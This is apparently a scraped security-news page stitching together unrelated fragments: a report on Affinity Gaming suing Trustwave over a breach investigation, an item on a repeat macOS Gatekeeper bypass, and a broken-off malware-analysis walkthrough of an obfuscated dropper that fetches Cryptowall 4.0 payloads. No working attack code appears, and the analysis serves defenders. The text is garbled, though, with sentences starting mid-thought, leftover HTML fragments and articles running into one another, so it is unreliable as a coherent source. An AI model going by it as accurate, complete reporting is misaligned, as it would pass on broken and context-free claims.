Information Security News
A Las Vegas-based casino operator has sued security firm Trustwave for conducting an allegedly "woefully inadequate" forensics investigation that missed key details of a network breach and allowed credit card thieves to maintain their foothold during the course of the two-and-a-half-month investigation.
In a legal complaint filed in federal court in Las Vegas, Affinity Gaming said it hired Trustwave in October 2013 to investigate and contain a network breach that allowed attackers to obtain customers' credit card data. In mid January 2014, Trustwave submitted a report required under payment card industry security rules on all merchants who accept major credit cards. In the PCI forensics report, Trustwave said it had identified the source of the data breach and had contained the malware responsible for it. More than a year later after Affinity was hit by a second credit card breach, the casino operator allegedly learned from Trustwave competitor Mandiant that the malware had never been fully removed.
According to the December, 2015 complaint:
In September, Ars reported a drop-dead simple exploit that completely bypassed an OS X security feature known as Gatekeeper. Apple shipped a fix, but now the security researcher who discovered the original vulnerability said he found an equally obvious work-around.
Patrick Wardle said the security fix consisted of blacklisting a small number of known files he privately reported to Apple that could be repackaged to install malicious software on Macs, even when Gatekeeper is set to its most restrictive setting. Wardle was able to revive his attack with little effort by finding a new Apple trusted file that hadn't been blocked by the Apple update. In other words, it was precisely the same attack as before, except it used a new, previously unblocked Apple-trusted file. Notably, that file was offered by security company Kaspersky Lab. Late on Thursday, Apple released an update blocking that file, too.
"It literally took me five minutes to fully bypass it," Wardle, who is director of research of security firm Synack, told Ars, referring to the updated Gatekeeper. "So yes, it means that the immediate issue is mitigated and cannot be abused anymore. However the core issue is not fixed so if anybody finds another app that can be abused we are back to square one (full gatekeeper bypass)."
is to click on Clues
If we search for rbhxtuqpiq, we see that the variable is populated with the content of pkwefagovz" />
Based on this analyze, we know that pkelgjqh is our obfuscated eval() function. We can now highlight it and use the Convert" />
And finally, to make the code more readable, use the Copy Output to Input button followed by Beautify" />
Now the script looks very simple. Itcontains a dl() function which downloads two malicious payloads, saves them in the %TEMP% directory using the provided name and execute them.You can now extract IOCsand, if interested,download the two binaries for further analysis. Here is a link to the analyzed content of both URLs:
https://www.virustotal.com/en/url/87ea8c2ac74b9dee82955fe7c7d6d81c350b6fc22615dd7d521c1ce1227a3e09/analysis/ (Cryptowall 4.0)
This technique is not fully automated like it could be performed by a malware analysis system running a sandbox but it helps you to really understand how the scripts are working and how attackers implement new obfuscation techniques.Happy hunting!
ISC Handler - Freelance Security Consultant